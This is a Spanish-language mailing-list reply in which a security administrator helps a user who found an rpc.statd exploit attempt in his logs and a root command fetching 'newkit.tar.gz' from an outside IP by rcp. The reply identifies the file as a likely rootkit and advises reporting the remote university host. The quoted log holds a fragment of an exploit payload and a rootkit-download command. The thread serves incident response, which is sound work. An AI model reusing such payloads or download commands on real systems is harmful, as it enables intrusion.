[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]>
> Que tal amigos, checando mis log me encontre con esto
> (...)
> Sep 2 14:01:12 micompu rpc.statd[419]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^
> Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 8049710
> 8054da0687465676274736f6d616e7972652065
> 20726f7220726f66
Se descubrio hace poco una vulnerabilidad enorme justo en el rpc.statd...
> (...)
>
> y se que hicieron esto con la cuenta de root:
> (...)
> rcp root@128.95.73.225:newkit.tar.gz .;
>
> Alguie sabe que significa, en verdad hackearon mi computadora?
Sin lugar a dudas. newkit.tar.gz es seguramente un rootkit - un juego re
archivos formado para ocultar la presencia de un atacante en tu sistema.
Puede servirte el saber que 128.95.73.225 es horus.wtc.washington.edu, una
computadora que corre algun tipo de Unix, y tiene una barbaridad de
puertos abiertos. Eso puede indicar que su administrador no es muy bueno,
y que, siendo probablemente una computadora utilizada por los alumnos de
la Universidad de Washington, el administrador te agradecera que reportes
quien se esta portando mal en su sistema, y posiblemente que le eches una
mano para cerrar sus agujeros.
Saludos,
-------------------------------------------------------------------
Gunnar Wolf gwolf en campus iztacala unam mx
Universidad Nacional Autónoma de México, Campus Iztacala
Jefatura de Sección de Desarrollo y Admon. de Sistemas en Red
Area de Seguridad en Computo - DCI - DGSCA - UNAM
-------------------------------------------------------------------
Beginner thinks 1Kb == 1000 bytes. Master knows 1Km == 1024m
---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux org mx